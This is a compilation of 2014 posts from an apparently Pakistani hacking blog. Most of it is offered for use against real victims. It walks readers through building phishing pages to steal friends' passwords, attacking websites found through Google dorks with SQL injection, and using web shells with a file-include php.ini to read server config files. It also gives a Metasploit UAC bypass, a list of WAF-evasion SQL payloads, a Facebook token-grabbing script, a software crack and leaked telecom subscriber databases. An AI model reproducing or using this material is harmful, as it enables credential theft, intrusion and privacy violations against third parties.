Hacking Tools And Hacking Tutorials

Free Fake Online Voice Caller, Send Free Sms To Voice Calls - PAKL33T | Daily Tips And Tricks For Facebook | Computer | Mobile.

2014-06-20T10:22:00.001+05:00

Free Fake Online Voice Caller, Send Free Sms To Voice Calls - PAKL33T | Daily Tips And Tricks For Facebook | Computer | Mobile.

[Must Read] Tips And Tricks Corner By FOCSoft Administrater, MS

2014-05-06T08:24:00.002+05:00

Assalam O Alikum Friends,
We Have Create A New Blog Related Tips And Tricks.
We Need Your Support For Our New Blog,
If You Have Any Suggestion Related Our New Blog, Then Kindly Kindly Reply....

Click Below Link For Our New Blog......
Our Blog Related These Topics.

Learn Hacking, FaceBook Hacking, Free Internet Tricks, Facebook Tricks, Latest All Network Database, SEO, SMO, Google Adsense Tricks, Earn Money, etc

Please Click Here

Latest All Network Database Working 100% - FOCSoft

2014-03-26T22:55:00.000+05:00

Hi Friends

[Assalam O Alikum]

Database Posted By:- Muhammad SHAHBAZ

FOCSoft.Blogspot.com

Today I'm Share All Networks Database

(Jazz, Telenor, UFone, Zong, Warid)

Only For Pakistani Friends, Because IT Is Working Only For Pakistani Networks.

Download From Here - & - Stay Here For More :p

Download 13 Parts Of The Database

No Need Any Password For These Files

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

Download Part 1 ~ Download Part 2

Download Part 3 ~ Download Part 4

Download Part 5 ~ Download Part 6

Download Part 7 ~ Download Part 8

Download Part 9 ~ Download Part 10

Download Part 11 ~ Download Part 12

Download Part 13
^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^
For Extract Use 7z Or Winrar
Use vMware Or My SQL Server 2000 For This Database

All Links Updated Successfuly

If These Links Not Works Try Out This, All Network Database
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

If You Want Any Kind Help, Then Please Comment Bellow.

How To Invite All Friends To Like Page Just In One Click (Easy Way) - FOCSoft

2014-03-25T17:53:00.000+05:00

Just a few days ago, I sent over 2,500 invitations to my facebook friends, asking them to like my fan page. You think I selected them one by one? Come on, you know that’s definitely not possible, I used a simple javascript that saved me the trouble of selecting them one after the other. With this script, I was able to select all friends and send the fan page invitation. Selecting your friends can be quite stressful especially if the page is new and you have tons of invites to send.

So, how Did I go about it?

Like I told you before, it’s nothing but a simple piece of java-script but we’re going to make a bookmark let with it

First download Java script from here Click here.

Now open your chrome browser and right click on Bookmark tab and click Add Page

-Than open the New bookmark option and Insert link in tab and save

- After that, go to your fan page and click on Build Audience > Invite Friends

- When your friends list come up, simply click on the bookmarklet you created toolbar earlier.

- It automatically selects all your friends and you can now send the invitation!

Hey, you may have to repeat this process a number of times depending on the number of people you have on your list. I tried it on a fan page but a friend also said it worked for event invitation. In case you have a facebook group too, you can try it and let us know if it works.

How To Make Phishing Page Of (Facebook, Twitter, Youtube, Gmail, Yahoo, Hotmail, Paypal, Pyaza, Google etc) - FOCSoft

2014-03-25T17:48:00.000+05:00

Hey guys here is Muhammad Shahbaz

Today we are discus about how to make phishing page easily

Phishing is use for hack login details of victim which you want to hack &
it is one type of fake page.

Here is one tool who make your phishing page in 1 click
No need knowledge of html ,php or any other knowledge of developing.

Let i will tell you how to create fake web pages and steal your friends username and password

Now Start Our Tutorial

1). First of all download Super Phisher here :-

Download

2). Extract it and open super phisher
it will look like top photo

3).In the field "URL of the login page" type the url of the login page of website of which u want to create fake web page

Example For yahoo :- http://mail.yahoo.com , for gmail: http://www.gmail.com

4)." name of log file " is file where your enemy details would be saved .you can give any name.txt

5). .php file is the main file here is the source of phisher
name .php

6). In the last field u have to type the url where u want to redirect the enemy after login ,it can be anything
example:- Facebook.com

7). Click on build phisher .

8). This creates two output files in output folder included

9). Create your free hosting account on any of these sites

10). Upload those two files on your free hosting account. (Note:-zip this folder and upload for better result)

11).Send the link of your phisher(.php) to your enemy

12). When he will login on this page a .txt file will be created on your free hosting account containing his login details

13). Check hosting folder for login details

You are done :)

Enjoy Hacking,....
For More Join Us At Hacking Tools And Hacking Tools

How To Add All Friends In Group (Super Fast Way) 2014 - FOCSoft

2014-03-21T21:26:00.002+05:00

Hello Friends,.. Assalam O Alikum

Today I'm Sharing A Facebook Script ( Auto Friends Adder In Group )

For This Purpose We Need Firefox
First Of All Open Facebook Group > Then Press Ctrl+Shift+k .
Then Paste This Script In Console .....

// ==UserScript==

// @name Add All Friends To Group By SHAHBAZ
// @namespace Hacking Tools And Hacking Tutorials
// @author Muhammad Shahbaz
// @include *://*.facebook.com/PrinceOfSahuka*
// @grant none
// @description Add All Your Friends To Facebook Group With Single Click
// @version 1
// ==/UserScript==
var T = 0;
var scss = 0;
var fail = 0;
var Allids = [];
var freeform = [];
var userStop = false;
var fb_dtsg = "";
var user = "672632971";"672632971"
var GroupId = "270219893156884";
var lang = document.documentElement.lang;
if (["ar"].indexOf(lang) < 0) {
lang = "en";
} else {
lang = "ar";
}
var locales = {
"ar": {
"addbstr": "????? ?? ????????",
"dlgtstr": "????? ???????? ??????",
"dlgwstr": "?? ???? ????? ?????? ...",
"dlgastr": "???? ?? ???? ??? ????? ??? ??? ??? ????????",
"dlgfstr": "??? ????????",
"dlgpstr": "??????",
"dlgrstr": "????",
"dlgsstr": "????",
"dlgistr": "???",
"dlgostr": "?????",
"dlgfsstr": "??? ?? ??????? (?????? ??????? ?? ????? ?? ????????)",
"dlgffstr": "?? ??????? ?????",
"dlgcnstr": "?????",
"dlgclstr": "?????"
},
"en": {
"addbstr": "Add All Friends",
"dlgtstr": "Adding Friends to Group",
"dlgwstr": "Www.FOCSoft.Blogspot.Com",
"dlgastr": "This May Take Some Time Depending On Your Friends Number",
"dlgfstr": "Approximately Friends Numbers",
"dlgpstr": "Processed",
"dlgrstr": "Remaining",
"dlgsstr": "Successed",
"dlgistr": "Failed",
"dlgostr": "Finish",
"dlgfsstr": "Faild to Add (Can't Add or Already a member)",
"dlgffstr": "Added successfully",
"dlgcnstr": "Cancel",
"dlgclstr": "Close"
}
};
var addbstr = locales[lang].addbstr;
var dlgtstr = locales[lang].dlgtstr;
var dlgwstr = locales[lang].dlgwstr;
var dlgastr = locales[lang].dlgastr;
var dlgfstr = locales[lang].dlgfstr;
var dlgpstr = locales[lang].dlgpstr;
var dlgrstr = locales[lang].dlgrstr;
var dlgsstr = locales[lang].dlgsstr;
var dlgistr = locales[lang].dlgistr;
var dlgfsstr = locales[lang].dlgfsstr;
var dlgffstr = locales[lang].dlgffstr;
var dlgcnstr = locales[lang].dlgcnstr;
var dlgclstr = locales[lang].dlgclstr;
var dlgostr = locales[lang].dlgostr;
CheckUrl(location.href);
var oldLocation = location.href;
setInterval(function() {
if(location.href != oldLocation) {
oldLocation = location.href;
CheckUrl(location.href);
}
}, 500);
function CheckUrl(place) {
if (/\/groups([\/?]|$)/i.test(place)) {
Main();
}
}
function Main() {
setTimeout(function(){ Main(); }, 500);
var settingsbutton = document.querySelector("#group_edit_settings_button");
var settingsbuttoncheck = setInterval(function() {
if (!document.getElementById('fbga') && settingsbutton) {
clearInterval(settingsbuttoncheck);
var groupsActions = settingsbutton.parentElement.parentElement;
var addbutton = document.createElement("a");
addbutton.className = "uiSelectorButton uiButton";
addbutton.id = "fbga";
var addbuttoninht = "addbuttoninht += "ass='uiButtonText'>" + addbstr + "";
addbutton.innerHTML = addbuttoninht;
addbutton.href = "#";
addbutton.addEventListener('click', GetFriends, false)
var addbuttonli = document.createElement("li");
addbuttonli.appendChild(addbutton);
groupsActions.insertBefore(addbuttonli, groupsActions.firstChild);
}
}, 10);
}
function GetFriends() {
if (!document.getElementById('fbgadialog')) {
userStop = false;
fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
user = getCookie("c_user");
GroupId = document.getElementsByName('group_id')[0].value;
var now = "&uid=" + (new Date).getTime();
var params = '__a=1&viewer=' + user + '&filter[0]=user&__user=' ;
params += user + now;
with (new XMLHttpRequest) {
open('GET', '/ajax/typeahead/first_degree.php?' + params, true);
send();
var result = "";
onreadystatechange = function (){
if (this.readyState == 4) {
if (this.status == 200) {
if (this.responseText) {
result = this.responseText;
result = result.substr(result.indexOf("[{")+2);
result = result.replace(/},{/gi, "\r\n");
GetIds(result);
}
}
}
}
}
}
}
function GetIds(res){
Allids = [];
freeform = [];
T = 0;
scss = 0;
fail = 0;
rre = res.split("\r\n");
for (var i = 0; i < rre.length; i++) {
var lin = rre[i].split(",");
var id = lin[0].split(":").pop();
var nam = lin[3].split(":").pop();
nam = nam.replace(/\"/gi,"");
freeform.push(nam)
Allids.push(id);
}
AddToGroup();
}
function AddToGroup() {
var AddDiv = document.createElement("div");
AddDiv.className = "_10 uiLayer";
AddDiv.id = "fbgadialog";
AddDiv.setAttribute("role", "dialog");
var bodytxt = "

" + dlgtstr + "

" + dlgwstr + "

" + dlgastr + "

" + dlgfstr + " : " + Allids.length + "

" + dlgpstr + " : 0 | " + dlgrstr + " : " + Allids.length + " | " + dlgsstr + " : 0 | " + dlgistr + " : 0

";
AddDiv.innerHTML = bodytxt;
document.body.appendChild(AddDiv);
var dlgclose = document.createElement("a");
dlgclose.className = "_42ft _42fu layerCancel uiOverlayButton _42gy";
dlgclose.setAttribute("role", "button");
dlgclose.href = "#";
dlgclose.id = "fbgabut";
dlgclose.textContent = dlgcnstr;
dlgclose.addEventListener('click', CancelButton , false);
document.getElementById("fbgadivclose").appendChild(dlgclose);
setTimeout(doinggo , 100);
}
function CancelButton() {
userStop = true;
}
function doinggo() {
if (T < Allids.length && !userStop) {
var params = "fb_dtsg=" + fb_dtsg + "&group_id=" + GroupId ;
params += "&source=typeahead&ref=&message_id=u_0_0&members=" ;
params += Allids[T] + "&freeform=" + encodeURIComponent(freeform[T]);
params += "&__user=" + user + "&__a=1&__req=f";
params += "&phstamp=" + generatePhstamp(params, fb_dtsg);
with (new XMLHttpRequest) {
open('POST', '/ajax/groups/members/add_post.php', true);
send(params);
var msg = "";
console.log("onreadystatechange");
onreadystatechange = function() {
if (this.readyState == 4) {
if (this.status == 200) {
if (this.responseText) {
console.log("responseText");
msg = this.responseText;
if (msg.indexOf("errorSummary") !== -1) {
fail++
document.getElementById("fbgapro").textContent = T + 1;
document.getElementById("fbgaram").textContent = (Allids.length - T - 1);
document.getElementById("fbgafal").textContent = fail;
T++
setTimeout(doinggo, 10);
} else {
scss++
document.getElementById("fbgapro").textContent = T + 1;
document.getElementById("fbgaram").textContent = (Allids.length - T - 1);
document.getElementById("fbgasuc").textContent = scss;
T++
setTimeout(doinggo, 10);
}
}
}
}
}
}
} else {
document.getElementById("fbgadlglin1").textContent = dlgostr;
document.getElementById("fbgadlglin2").innerHTML = "" + scss + " " + dlgffstr;
document.getElementById("fbgadlglin3").setAttribute("style", "font-weight:bold;");
document.getElementById("fbgadlglin3").innerHTML = "" + fail + " " + dlgfsstr;
document.getElementById("fbgadlglin4").parentNode.removeChild(document.getElementById("fbgadlglin4"));
document.getElementById("fbgabut").parentNode.removeChild(document.getElementById("fbgabut"));
var dlgclos = document.createElement("a");
dlgclos.className = "_42ft _42fu layerCancel uiOverlayButton _42gy";
dlgclos.setAttribute("role", "button");
dlgclos.href = "#";
dlgclos.id = "fbgabut";
dlgclos.textContent = dlgclstr;
dlgclos.addEventListener('click', CloseButton , false);
document.getElementById("fbgadivclose").appendChild(dlgclos);
}
}
function CloseButton() {
document.getElementById("fbgadialog").parentNode.removeChild(document.getElementById("fbgadialog"));
}
function generatePhstamp(qs, dtsg) {
var input_len = qs.length;
numeric_csrf_value='';
for(var ii=0;iinumeric_csrf_value+=dtsg.charCodeAt(ii);
}
return '1' + numeric_csrf_value + input_len;
}
function getCookie(c_name) {
var i,x,y,ARRcookies=document.cookie.split(";");
for (i=0;ix=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
x=x.replace(/^\s+|\s+$/g,"");
if (x==c_name) {
return unescape(y);
}
}
}

When You Done It, At The Header Show Like This

Click ( Add All Friends ) Now It'll Look Like This,..

Now Wait Till Its End ....................

This Post Is Requested By ( 0ne Of My Best Friend ) Syed Jeeshan Ali.....

VPNium v1.7 Premium Full Version + Crack Full Free Download - FOCSoft

2014-03-21T18:32:00.000+05:00

VPNium v1.7 Premium – anonymous VPN- prospective shoppers.Many people at work is impermissible to use social networks, and then wish. Out there – golf stroke yourself VPNium you at work to ascertain my account on any social networks.Use merely free VPN service.256 – 2048 tiny safety measures, browse anonymously, browse even though not censorship, browse firmly, freed from charge. Isn’t it awesome?

Download Free VPNium v1.7 Premium :-

Crack :-

VPNium v1.7 Premium Crack :-

How To Block Any Website Without Software 2014 - FOCSoft

2014-03-21T18:25:00.001+05:00

Today in internet many fraud scam and harmful website available for stole your importent informations but today i am show you how to block that website without any software or any tool.so lets start our trick below

Steps:

1] Browse C:\WINDOWS\system32\drivers\etc

2] Find the file named "HOSTS"

3] Open it in notepad

4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.

5] Done!

-So-

127.0.0.1 localhost
127.0.0.2 www.blockedsite.com

-->www.blockedsite.com is now unaccessable<-- span="">

For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.

IE: 127.0.0.3 www.blablabla.com
127.0.0.4 www.blablabla.com
127.0.0.5 www.blablabla.com

How To Access Blocked Website By Department Of Telecom - FOCSoft

2014-03-21T18:21:00.001+05:00

From a few months many website blocked by government and user facing problem to access them,
Same here me also facing this problem too but here is one solution

This site has been blocked as per instructions from Department of Telecom (DOT) .

So here we are share one easy trick to access blocked website by Department of telecom

Just Put https:// before website blocked

Example :- xyz.com (Wrong)
https://www.xyz.com (Correct)

Now you can access blocked website

Enjoy! :)

How To Chack Any Wbesite Vulnerability - FOCSoft

2014-03-21T18:16:00.003+05:00

Top 3 Vulnerability Scanners Tool

Hello Friends

Web site security is extremely necessary as a result of web site contain relevant info a few company and currently a days website defacement is extremely common even a script kiddies and a brand new born hackers will try this. the foremost common vulnerability like SQL-Injection and cross website scripting lead towards the defacement.

So you wish to secure your net application than realize vulnerabilities thereon before a hacker realize it, try and use some relevant tools and realize vulnerabilities and fix it. There area unit such a big amount of tools offered for each Windows and Linux platform and business and open source tool. Below is that the best internet vulnerability scanner tool that we've mentioned before.

Arachni

Free, Open Source, Simple, Distributed, Intelligent, Powerful, Friendly. Arachni is an Open Source, feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart, it trains itself by learning from the HTTP responses it receives during the audit process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify false-positives.

It is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform.

Acunetix

Acunetix has pioneered the web application security scanning technology: Its engineers have focused on web security as early as 1997 and developed an engineering lead in web site analysis and vulnerability detection

As many as 70% of websites have vulnerabilities which could be exploited by
hackers or rogue insiders, leading to theft of sensitive corporate data such as
credit card information and customer lists.

Hackers concentrate their efforts on web-based applications such as
shopping carts, forms, login pages, dynamic content and plain-and-simple
human error. Accessible 24/7 from anywhere in the world, insecure web
applications provide easy access to backed corporate databases and allow
hackers to perform illegal activities using the compromised site.

Netsparker

Netsparker is the only False-positive-free web application security scanner. Simply point it at your website and it will automatically discover the flaws that could leave you dangerously exposed.

How To Hack A Website With WebCruiser Scanner - FOCSoft

2014-03-17T18:50:00.000+05:00

Hello Friends
How To Hack A Website With WebCruiser Scanner
[*]Introduction
Welcome to my step by step tutorial on how to hack a website using WebCruiser Scanner.
As always I will try to explain it in the easiest way so it will be n00b friendly.
I suggest you to practice "hacking" manually as using tools wont make your skills go higher.
Whatsoever there are lazy-ass guys :P who find it better to perform these attacks by tools.
Ok , first of all we need to download WebCruiser Scanner. Download From Here ! _____________________________

[*] Let's start:

You will need a target , you can use google dorks to find vulnerable websites.
I won't bother on that part as there are billions of google dorks out there.
OK, I found my vulnerable website:

Code:

http://www.target.com/vmarket.php?id=17

Let's open WebCruiser Scanner and check the target for vulnerabilities like on the picture below:

Hacking Tools And Hacking Tutorials

Then click Scan Site.

Hacking Tools And Hacking Tutorials

Now we will wait a minute or two , depends on you internet connection speed for the scan to finish , then we will see the results like the image below.

As we can see the website is vulnerable to Sql injection & XSS.
We will perform a SQL injection this time.
[*] Attack
Right click on the vulnerable url and then SQL INJECTION POC , now you
just need to follow the steps below.
I have explained step by step with pictures so it will be easier for you to understand.

Hacking Tools And Hacking Tutorials

So that's all guys, we got the admin info in just 5 minutes :>

Detecting RATs/Keyloggers Installed On Your PC Using CMD And TaskManager - FOCSoft

2014-03-17T18:30:00.000+05:00

Hello Friends

In this tutorial, I'll be showing you the easiest way of finding out malicious applications installed on your PC that transfer data using the internet without you knowing it.

As stated in the title, we'll be using TaskManager and CMD for the purposes of this tutorial.

1. To get started, open up your TaskManager by right clicking your TaskBar and selecting TaskManager or just hit CTRL+ALT+DEL to get it open.

2. Once that is done, click the "Processes" tab of your TaskManager and click View -> Select Columns -> Make sure that "Process Identifier(PID)" is ticked.

3. Now click the PID column to make sure that all the processes are sorted in a specific order. This step is not necessary, but it will make it easier for you to detect processes using their IDs.

Once you've done that right, we're going to move on to part 2 of our tutorial, which is using CMD to view established connections.

Assuming you know how to open up CMD, I'm just going to rush through step 1.
1. Start -> Run -> CMD
OR
Just type in cmd in the searchbar if you're running a system powered by Windows7.

2. Once cmd is open, I want you to type in "netstat -ano".
Your result should be something like this:

3. Now what we're interested in are only the connections with the state "ESTABLISHED".
Isolate them out and look for the PID right next to them. There will be many connections with "ESTABLISHED" state, you'll have to repeat the following steps for all of them.

This is the fun part. Now go back to the TaskManager and look for the name of the process(es) that has the same PID(s) as the one you found with the ESTABLISHED connection(s).

In the above case, it's a safe and trusted application known as Dropbox, so I'm good. But incase you find a process which you do not know, if it's something like svchost.exe that you're sure is infected, right click the process and select "Open File Location".

Now all you have to do is right click the file and scan it using your AV or upload it to an online scanner such as VirusTotal.com and check if it's infected.

It's as easy as that.
Hope you find this useful.

403 Forbidden And Can't Read /ect/named.conf Error Bypass - FOCSoft

2014-03-17T18:10:00.000+05:00

Hello Friends

In These days Linux Kernel server show this error when you try to symlink the server . Most of the server which shows 403 forbidden has cant read named.config error when you try to symlink using scripts like Symlink_Sa or Madspot Security Team Shell or what ever script used for Automated Symlink .

This can be bypassed by Reading /ect/passwd and Symlink_Sa 3.0 can be used to bypass this .

I will be posting the download link of some shells i will be using in this tutorial

Best Script which can bypass cant read /ect/named.conf are :

1. Config Fucker By Web Root Hack Tools. ( Mass Symlink Config files )
2. Config Killer By Team Indishell . ( Mass Symlink Config file php based script )
3. Symlink Pain [~] allsoft.pl ( Perl Script to Mass Symlink Config files )
4. Symlink_Sa 3.0 Automated Symlink Script .

Usage : Config Fucker , Con fig Killer and Symlink Pain [~] Perl script just upload them on to the server make sure that you create a new directory . Upload the scirpt and use the command cat /ect/passwd to read all /ect/passwd from the server and copy them and just open your script and paste it there and click on Get Config and Your Done . Just open the link of the folder you created eg . site.com/sen/allsoft.pl you need to open site.com/sen/ and all config files will be there

Note : Its better to create a php.ini file before you do this for 100 % Result

All 4 shells i have mentioned i will post the download link

And i will be using a another private shell for this which i wont be giving you all for Priv8 Issue its Mannu Shell Coded by Team Indishell Which can bypass cant read /ect/named.conf error easily . But 403 Forbidden Server cant be bypassed using this shell .

So now if we cant to symlink to the Public_html/ of the website we can use Symlink_sa 3.0 script Symlink Bypass Option -

So now that we can easily Symlink to /Public_html/ path of each website

Now some server show 403 forbidden Error when you try to Symlink them so now lets see how to by pass this shit

For 403 Forbidden Error i will be Using the Following Shells :

1. Dhanush Shell Coded By Arjun . ( This shell automitically creates .htaccess , php.ini and ini.php files after you login )
2. Mannu Shell by Team Indishell Private ! .
3. Symlink_sa 3.0 Script

I will be posting the download link of Dhanush shell and Symlink _sa 3.0 ( Mannu shell is private as i already told )

So what is the trick that makes us bypass 403 Forbidden , Its just the .htaccess and php.ini which contains the following code :

.htaccess

SecFilterEngine Off
SecFilterScanPOST Off

php.ini

echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

1.) 403 Forbidden Error :

2.) Open Dhanush Shell which automatically creates .htaccess , php.ini and ini.php .

3.) Mannu shell to Check if we Bypassed 403 Error :

4.) Bypassed 403 Forbidden and Access to Public_html/ Path

Bypassed can't read /ect/named.conf and 403 forbidden Error

Here Download Link of all shell and script i used :
Download From Here

How To Bypass UAC Protection Of Remote Windows PC in Memory Injection - FOCSoft

2014-03-17T17:41:00.001+05:00

Hello Friends

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three seperate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also)

Exploit Targets

Windows 32 bit

Windows 64 bit

Requirement

Attacker: kali Linux

Victim PC: Windows

Open Kali terminal type msfconsole

Now type use exploit/windows/local/bypassuac_injection

msf exploit (bypassuac_injection)>set session 1

msf exploit (bypassuac_injection)>set lhost 192.168.1.6 (IP of Local Host)

msf exploit (bypassuac_injection)>exploit

SQL Injection Complex Waf Bypassing - FOCSoft

2014-03-16T06:46:00.000+05:00

Hello Friends
Note: Before starting this topic, I want to clarify that I won't be covering on basic SQL Injection attacks. This article is meant for WAF /Filter bypassing during Injection.

What is WAF?

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and Cross Site Scripting (XSS) attacks.

How does it Work?

When WAF detects any malicious input from end user, It gives 403 Forbidden, 406 Not Acceptable or any Kind of Custom errors

What to do next?

So, what to do next? we cant do our further injection right?
Well its time to use various techniques to bypass thing. Some of these techniques are mentioned below:

# Case Changing:

Most of the Waf's only filter lowercase or higher-case keywords. We can easily evade that kind of wafs by using alternate case.

if union select is forbidden , we can always try UNION SELECT instead. And if both does not work, We can try our luck with using mixture of both. like UniOn seLeCt

# Using Comments

SQL comments really help us in many cases. They play their important role in killing some Waf's Restrictions. e.g

// , -- , --+ , #, -- -

# Inline Comments

Some WAF’s filter keywords like /union\sselect/ig We can bypass these filters by using inline comments most of the time

http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,3--

Tip: Read SQLi Errors carefully. Sometimes they left error from which we can have idea that how waf is working on this site.

Anyways, We were talking about Filtered Keywords. So it does not mean that waf is only filtering union select. It may be filtering all SQL keywords like table_name, column_name etc
So might need to apply these inline comments on those keywords as well. Example

http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,/*!table_name*/,4,5 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema*/=database()--

# Double use of Keywords

Sometimes WAF removes whole keyword from the query and execute it and throw errors
In such cases, we can use keywords in this way

http://localhost/waf.php?id=1 UNunionION SELselectECT 1,2,3,4,5,6--

Anyways It totally depends upon the scenario. Im just giving a common Idea. Rest is upon you that how you use it.

# Using Different types of Whitespaces

Sometime Waf may be filtering the whitespace we are using between keywords. We mostly use Spaces But space is not the only whitespace we can use in SQL injection. We have some other options as well
for example + .
%20 is use for space, but we can try using one of these whitespaces . some examples are %09 %0A %0B %0C %0D %A0

inurl:

union%0Bselect%0B1,2,3--

# Encoding

We can always try our luck with URL encode thing to bypass WAF. For example we can use

union select 1,/*!table_name*/,3 from information_schema.tables where table_schema=database()
as
union%20select%201,%2f%2a%21table_name%2a%2f,3%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29

but sometime waf filter also filter % itself. So we have to use double URL encoding in that case

union%2520select%25201,%2f%2a%21table_name%2a%2f%2520,3 from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529

# Unexpected Input

This scenario is very rare that we have to use buffer overflow or give unexpected query /request to trick WAF filters.
for example:

http://localhost/waf.php?id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) union select 1,2,3,4,5--

This thing only worked once for me. But knowledge is Power, may be you face any scenario that can be bypassed by using buffer overflow

# use all above mentioned techniques together

ah.. tried all those things but still its showing NOT ACCEPTABLE or FORBIDDEN. well its time to use all these above mentioned techniques combined.
For example: you can use alternative cases with inline comments or obfuscation.

#Some Common Union Select Solutions:

%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT

I hope you have enjoyed this article. Please give us your feedback. So that we maybe able to make things more clear for you next time.

SQL Injection With HTML Tags - FOCSoft

2014-03-16T06:40:00.000+05:00

.
Hello Friends
Today i will guide you on how to perform SQL Injection with html tags,
In Other words, we put html tags together with our sqli query to be executed.

This you need first Before starting

A SQLI Vulnerable site.

(in my case im using DVWA PenLab)

DVWA PenLab

Bare Hands :)

Step 1,

Go to mozilla ang type 127.0.0.1
Sign in to DVWA with default Login details
" admin:password"

Step 2
Step go to DVWA Security, Change it To Low.
save it, Then Go to SQL Injection

Step 3
Find how many columns
so yeah, The column numbers are 2
so lets try union select query to get the columns

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires' UNION SELECT 1,2--+&Submit=Submit#

Now the 1and 2 columns appeared

Then
Get the basic info column.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires' UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2--+&Submit=Submit#

So the 1 and 2 column appeared.

Now, it is time
Lets add now the HTML tags. Follow the query.
"Dont worry, if you find hard to get this, there's a video tutorial at the end of this tutorial"

Code:

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires' UNION SELECT group_concat(0x

Injected by Sp4nkwires,0x
,user(),0x,0x
,database(),0x,0x,version(),0x),2--+&Submit=Submit#

Now
My HTML Syntax before converting to HEX (Just to show you guys what I'm doing, It will not work You have to Convert it to HEX)

After Converting to hex

Code:

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires' UNION SELECT group_concat(0x3c62723e3c62723e3c623e3c666f6e742073697a653d22362220636f6c6f723d22677265656e223e496e6a6563746564206279205370346e6b77697265733c2f623e3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22626c7565223e,user(),0x3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22726564223e,database(),0x3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22626c7565223e,version(),0x3c2f666f6e743e),2--+&Submit=Submit#

Now, you can Modify you html tags and add more content.. like this.

Code:

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires' UNION SELECT group_concat(0x

Injected by Sp4nkwires

,0x
Current User::,user(),0x,0x
Current Database::,database(),0x,0x
MySQL Version::,version(),0x),2--+&Submit=Submit#

After Hexing

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires' UNION SELECT group_concat(0x3c62723e3c62723e3c623e3c666f6e742073697a653d22362220636f6c6f723d22677265656e223e496e6a6563746564206279205370346e6b77697265733c2f623e3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22626c7565223e43757272656e7420557365723a3a,user(),0x3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22726564223e43757272656e742044617461626173653a3a,database(),0x3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22626c7565223e4d7953514c2056657273696f6e3a3a,version(),0x3c2f666f6e743e),2--+&Submit=Submit#

How To Setup Penetration Testing LAB With DVWA - FOCSoft

2014-03-16T06:35:00.000+05:00

Good day friends, last time i posted a guide on how to xss websites, the filters and evations. Since finding hard in finding vulnerables sites for making tutorials, now i will guide you on how to to make or setup a pentesting lab with DVWA(Damn Vulnerable Web Application).

PentesterLab
          PentesterLab provides vulnerable systems that can be used to test and understand vulnerabilities.Mostly White hat hackers or IT Security Team create a Penetration lab to practice their hacking tools, tricks and even to prevent hacking. Even beginner hacker also want to learn hacking skills like SQL Injection, XSS, CSRF attack etc, this all hacking tricks require a vulnerable website to Explode the Vulnerability and to learn hacking skills.

DVWA(Damn Vulnerable Web Application)
          Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

How to Install DVWA on Windows Platform
           Setting up DVWA pentesting lab on Windows system is very easy.
just follow the steps given below.

Download DVWA (Damn Vulnerable Web Application)

Download XAMPP server for Windows.

Install Xampp server on Windows

Extract all files from DVWA to desktop

Copy entire folder "DVWA" to "C:\xampp\htdocs"

